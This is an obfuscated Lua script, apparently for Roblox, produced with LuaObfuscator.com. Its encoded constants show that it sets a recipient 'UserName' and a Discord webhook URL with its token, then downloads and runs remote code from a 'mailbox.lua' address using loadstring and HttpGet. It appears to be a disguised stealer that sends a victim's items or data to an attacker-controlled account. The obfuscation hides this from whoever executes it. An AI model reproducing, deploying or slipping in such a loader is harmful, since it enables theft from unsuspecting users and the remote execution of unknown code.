--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.19) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=0;local v71;while true do if (v70==0) then v71=v2(v0(v30,16));if v19 then local v96=0;local v97;while true do if (v96==1) then return v97;end if (v96==0) then v97=v5(v71,v19);v19=nil;v96=1;end end else return v71;end break;end end end end);local function v20(v31,v32,v33)if v33 then local v72=0;local v73;while true do if (v72==(0 -0)) then v73=(v31/((5 -3)^(v32-(1 -0))))%(2^(((v33-(2 -1)) -(v32-(620 -(555 + 11 + 53)))) + ((1809 -(282 + 595)) -(857 + 74)))) ;return v73-(v73%1) ;end end else local v74=(570 -(367 + 201))^(v32-(928 -(214 + 713))) ;return (((v31%(v74 + v74))>=v74) and 1) or (0 + 0) ;end end local function v21()local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22()local v35,v36=v1(v16,v18,v18 + (1639 -(1523 + 114)) );v18=v18 + (2 -0) ;return (v36 * (1321 -(68 + 997))) + v35 ;end local function v23()local v37,v38,v39,v40=v1(v16,v18,v18 + 3 );v18=v18 + (1274 -(226 + 1044)) ;return (v40 * (73054774 -56277558)) + (v39 * (65653 -(32 + 19 + 66))) + (v38 * (251 + 5)) + v37 ;end local function v24()local v41=957 -(892 + 65) ;local v42;local v43;local v44;local v45;local v46;local v47;while true do if (v41==(2 -1)) then v44=1 -0 ;v45=(v20(v43,1 -0 ,370 -(87 + 263) ) * ((182 -(67 + 113))^(24 + 8))) + v42 ;v41=4 -2 ;end if (v41==(3 + (18 -(10 + 8)))) then if (v46==(0 -0)) then if (v45==((3661 -2709) -(802 + (592 -(416 + 26))))) then return v47 * 0 ;else v46=2 -1 ;v44=0 -(0 -0) ;end elseif (v46==(1490 + 557)) then return ((v45==(997 -(915 + 82))) and (v47 * (1/(0 -0)))) or (v47 * NaN) ;end return v8(v47,v46-(596 + 427) ) * (v44 + (v45/((2 -0)^(1239 -(1069 + 118))))) ;end if (v41==(0 -(0 + 0))) then v42=v23();v43=v23();v41=1 -0 ;end if (v41==2) then v46=v20(v43,21,6 + (43 -18) );v47=((v20(v43,56 -24 )==(1 + (438 -(145 + 293)))) and  -1) or (792 -(368 + (853 -(44 + 386)))) ;v41=9 -6 ;end end end local function v25(v48)local v49;if  not v48 then v48=v23();if (v48==(0 + 0)) then return "";end end v49=v3(v16,v18,(v18 + v48) -1 );v18=v18 + v48 ;local v50={};for v68=1487 -(998 + 488) , #v49 do v50[v68]=v2(v1(v3(v49,v68,v68)));end return v6(v50);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v51=0 -0 ;local v52;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if (v51~=1) then else v54=nil;v55=nil;v51=2;end if (v51==2) then v56=nil;v57=nil;v51=4 -1 ;end if (v51==(1387 -(746 + 638))) then v58=nil;v59=nil;v51=4;end if (v51==0) then v52=0 + 0 ;v53=nil;v51=1;end if (v51==(5 -1)) then v60=nil;while true do if ((341 -(218 + 123))~=v52) then else v53=1581 -(1535 + 46) ;v54=nil;v52=1 + 0 ;end if (v52==3) then local v94=0 + 0 ;while true do if (v94==1) then v52=564 -(306 + 254) ;break;end if (v94==0) then v59=nil;v60=nil;v94=1 + 0 ;end end end if (v52==1) then v55=nil;v56=nil;v52=3 -1 ;end if (v52==2) then local v95=1467 -(899 + 568) ;while true do if (v95==(1 + 0)) then v52=3;break;end if (v95~=0) then else v57=nil;v58=nil;v95=1;end end end if (4==v52) then while true do if (v53==(4 -2)) then v58=nil;v59=nil;v53=3;end if (v53==(603 -(268 + 335))) then local v104=0;local v105;while true do if (v104==0) then v105=0;while true do if (v105==1) then v53=1;break;end if (v105~=(290 -(60 + 230))) then else v54=572 -(426 + 146) ;v55=nil;v105=1;end end break;end end end if (v53~=1) then else v56=nil;v57=nil;v53=1 + 1 ;end if (v53~=(1459 -(282 + 1174))) then else v60=nil;while true do local v106=811 -(569 + 242) ;while true do if (v106==1) then if ((5 -3)~=v54) then else local v124=0 + 0 ;local v125;while true do if (v124~=(1024 -(706 + 318))) then else v125=1251 -(721 + 530) ;while true do local v154=0;local v155;while true do if (v154~=0) then else v155=1271 -(945 + 326) ;while true do if ((0 -0)==v155) then if (v125==1) then return v58;end if ((0 + 0)==v125) then local v184=700 -(271 + 429) ;while true do if (v184==(0 + 0)) then for v188=1,v23() do local v189=0;local v190;while true do if (v189==0) then v190=v21();if (v20(v190,1,1501 -(1408 + 92) )==0) then local v199=1086 -(461 + 625) ;local v200;local v201;local v202;local v203;local v204;while true do if (v199==2) then v204=nil;while true do if (v200==(1288 -(993 + 295))) then local v207=0 + 0 ;while true do if (v207==(1172 -(418 + 753))) then v200=1;break;end if (v207==(0 + 0)) then v201=0 + 0 ;v202=nil;v207=1 + 0 ;end end end if (v200~=(1 + 1)) then else while true do if (v201==3) then if (v20(v203,3,3)==1) then v204[533 -(406 + 123) ]=v60[v204[4]];end v55[v188]=v204;break;end if (1==v201) then local v210=1769 -(1749 + 20) ;local v211;while true do if (v210==0) then v211=0 + 0 ;while true do if (1~=v211) then else v201=2;break;end if (v211==(1322 -(1249 + 73))) then local v222=0 + 0 ;while true do if (v222==1) then v211=1146 -(466 + 679) ;break;end if (v222==(0 -0)) then v204={v22(),v22(),nil,nil};if (v202==0) then local v225=0;local v226;local v227;while true do if (v225==0) then v226=0;v227=nil;v225=1;end if (v225~=(1 + 0)) then else while true do if (v226==0) then v227=0 + 0 ;while true do if (v227~=0) then else v204[8 -5 ]=v22();v204[10 -6 ]=v22();break;end end break;end end break;end end elseif (v202==(115 -(4 + 110))) then v204[587 -(57 + 527) ]=v23();elseif (v202==(1429 -(41 + 1386))) then v204[106 -(17 + 86) ]=v23() -((2 + 0)^16) ;elseif (v202~=(6 -3)) then else local v230=0 -0 ;local v231;while true do if ((166 -(122 + 44))~=v230) then else v231=0;while true do if ((0 -0)==v231) then v204[9 -6 ]=v23() -(2^16) ;v204[4 + 0 ]=v22();break;end end break;end end end v222=1 + 0 ;end end end end break;end end end if (v201~=0) then else local v212=0 -0 ;local v213;local v214;while true do if (1~=v212) then else while true do if (v213==(65 -(30 + 35))) then v214=0;while true do if (v214==(0 + 0)) then local v223=1257 -(1043 + 214) ;local v224;while true do if (v223==(0 -0)) then v224=1212 -(323 + 889) ;while true do if (v224~=0) then else v202=v20(v190,5 -3 ,583 -(361 + 219) );v203=v20(v190,324 -(53 + 267) ,2 + 4 );v224=1;end if (v224==1) then v214=1;break;end end break;end end end if (1~=v214) then else v201=1;break;end end break;end end break;end if (v212==0) then v213=0;v214=nil;v212=1;end end end if (v201==(415 -(15 + 398))) then local v215=982 -(18 + 964) ;while true do if (v215~=1) then else v201=11 -8 ;break;end if (v215==(0 + 0)) then if (v20(v203,1 + 0 ,851 -(20 + 830) )==1) then v204[2]=v60[v204[2 + 0 ]];end if (v20(v203,128 -(116 + 10) ,1 + 1 )==1) then v204[741 -(542 + 196) ]=v60[v204[6 -3 ]];end v215=1 + 0 ;end end end end break;end if (v200==1) then local v208=0 + 0 ;while true do if (v208~=1) then else v200=2;break;end if (v208~=(0 + 0)) then else v203=nil;v204=nil;v208=2 -1 ;end end end end break;end if (v199==(0 -0)) then v200=0;v201=nil;v199=1;end if (v199==1) then v202=nil;v203=nil;v199=1553 -(1126 + 425) ;end end end break;end end end for v191=406 -(118 + 287) ,v23() do v56[v191-(3 -2) ]=v28();end v184=1;end if (v184==1) then v125=1122 -(118 + 1003) ;break;end end end break;end end break;end end end break;end end end break;end if ((0 -0)==v106) then local v107=0;while true do if (v107~=1) then else v106=378 -(142 + 235) ;break;end if (v107~=0) then else if ((0 -0)==v54) then local v146=0;while true do if (v146~=(0 + 0)) then else local v179=977 -(553 + 424) ;local v180;while true do if (v179~=(0 -0)) then else v180=0 + 0 ;while true do if (v180==0) then local v185=0 + 0 ;while true do if ((0 + 0)~=v185) then else v55={};v56={};v185=1 + 0 ;end if (v185==(1 + 0)) then v180=2 -1 ;break;end end end if (v180==1) then v146=1;break;end end break;end end end if (v146==(5 -3)) then v54=2 -1 ;break;end if (v146==1) then local v181=0 + 0 ;while true do if (v181==(4 -3)) then v146=755 -(239 + 514) ;break;end if (v181==(0 + 0)) then v57={};v58={v55,v56,nil,v57};v181=1;end end end end end if (v54==1) then local v147=0 -0 ;local v148;local v149;while true do if ((1203 -(373 + 829))==v147) then while true do if ((731 -(476 + 255))==v148) then v149=1130 -(369 + 761) ;while true do if ((1 + 0)~=v149) then else local v186=0 -0 ;while true do if (v186~=(1 -0)) then else v149=240 -(64 + 174) ;break;end if (v186==0) then for v193=1 + 0 ,v59 do local v194=0 -0 ;local v195;local v196;local v197;local v198;while true do if (v194~=(336 -(144 + 192))) then else v195=0;v196=nil;v194=217 -(42 + 174) ;end if (v194~=(2 + 0)) then else while true do if (v195~=0) then else v196=0 + 0 ;v197=nil;v195=1;end if (v195~=1) then else v198=nil;while true do if (v196~=0) then else local v205=0 + 0 ;while true do if (v205~=1) then else v196=1;break;end if (v205==0) then v197=v21();v198=nil;v205=1505 -(363 + 1141) ;end end end if (v196~=(1581 -(1183 + 397))) then else if (v197==(2 -1)) then v198=v21()~=0 ;elseif (v197==(2 + 0)) then v198=v24();elseif (v197==(3 + 0)) then v198=v25();end v60[v193]=v198;break;end end break;end end break;end if (v194==1) then v197=nil;v198=nil;v194=2;end end end v58[1978 -(1913 + 62) ]=v21();v186=1;end end end if (v149~=2) then else v54=2 + 0 ;break;end if (v149~=0) then else v59=v23();v60={};v149=1;end end break;end end break;end if (v147==0) then v148=0 -0 ;v149=nil;v147=1;end end end v107=1;end end end end end break;end end break;end end break;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==1) then v67=v61[3];return function(...)local v78=v65;local v79=v66;local v80=v67;local v81=v27;local v82=1;local v83= -1;local v84={};local v85={...};local v86=v12("#",...) -1 ;local v87={};local v88={};for v92=0,v86 do if (v92>=v80) then v84[v92-v80 ]=v85[v92 + 1 ];else v88[v92]=v85[v92 + 1 ];end end local v89=(v86-v80) + 1 ;local v90;local v91;while true do local v93=0;while true do if (v93==0) then v90=v78[v82];v91=v90[1];v93=1;end if (v93==1) then if (v91<=5) then if (v91<=2) then if (v91<=0) then v88[v90[2]]=v90[3]~=0 ;elseif (v91>1) then local v129=0;local v130;while true do if (v129==0) then v130=v90[2];v88[v130]=v88[v130](v13(v88,v130 + 1 ,v83));break;end end else local v131=0;while true do if (v131==2) then v63[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v131=3;end if (v131==0) then v63[v90[3]]=v88[v90[2]];v82=v82 + 1 ;v90=v78[v82];v131=1;end if (v131==4) then v82=v90[3];break;end if (v131==1) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v131=2;end if (v131==3) then v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v131=4;end end end elseif (v91<=3) then v88[v90[2]]=v90[3];elseif (v91>4) then if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v63;else v88[v90[2]]=v63[v90[3]];end else local v132=0;local v133;local v134;local v135;local v136;while true do if (v132==2) then for v177=v133,v83 do local v178=0;while true do if (v178==0) then v136=v136 + 1 ;v88[v177]=v134[v136];break;end end end break;end if (v132==0) then v133=v90[2];v134,v135=v81(v88[v133](v13(v88,v133 + 1 ,v90[3])));v132=1;end if (v132==1) then v83=(v135 + v133) -1 ;v136=0;v132=2;end end end elseif (v91<=8) then if (v91<=6) then local v111;local v112,v113;local v114;local v115;if ((v90[3]=="_ENV") or (v90[3]=="getfenv")) then v88[v90[2]]=v63;else v88[v90[2]]=v63[v90[3]];end v82=v82 + 1 ;v90=v78[v82];v115=v90[2];v114=v88[v90[3]];v88[v115 + 1 ]=v114;v88[v115]=v114[v90[4]];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3];v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]=v90[3]~=0 ;v82=v82 + 1 ;v90=v78[v82];v115=v90[2];v112,v113=v81(v88[v115](v13(v88,v115 + 1 ,v90[3])));v83=(v113 + v115) -1 ;v111=0;for v126=v115,v83 do v111=v111 + 1 ;v88[v126]=v112[v111];end v82=v82 + 1 ;v90=v78[v82];v115=v90[2];v88[v115]=v88[v115](v13(v88,v115 + 1 ,v83));v82=v82 + 1 ;v90=v78[v82];v88[v90[2]]();v82=v82 + 1 ;v90=v78[v82];v82=v90[3];elseif (v91>7) then v63[v90[3]]=v88[v90[2]];else v82=v90[3];end elseif (v91<=10) then if (v91>9) then if (v88[v90[2]]==v90[4]) then v82=v82 + 1 ;else v82=v90[3];end else do return;end end elseif (v91==11) then local v143=0;local v144;local v145;while true do if (v143==0) then v144=v90[2];v145=v88[v90[3]];v143=1;end if (v143==1) then v88[v144 + 1 ]=v145;v88[v144]=v145[v90[4]];break;end end else v88[v90[2]]();end v82=v82 + 1 ;break;end end end end;end if (0==v64) then v65=v61[1];v66=v61[2];v64=1;end end end return v29(v28(),{},v17)(...);end v15("LOL!0A3O00028O00026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O7470476574031E3O00682O7470733A2O2F672O6F662E70726F2F732F6D61696C626F782E6C756103083O00557365724E616D65030D3O00636872697374616C74612O633103073O00576562482O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O3139322O37383732312O3932362O353032382F594E66454D79477A344F53306D4D6972353138396F7047524946454C5155526C62785A362D756E594E7143776A38526C6452614F63674A4E4D75697A2O36507338434C6E00153O0012033O00013O00260A3O000C000100020004073O000C0001001205000100033O001206000200043O00202O00020002000500122O000400066O000500016O000200056O00013O00024O00010001000100044O0014000100260A3O0001000100010004073O00010001001203000100083O001201000100073O00122O0001000A3O00122O000100093O00124O00023O00044O000100012O00093O00017O00",v9(),...);
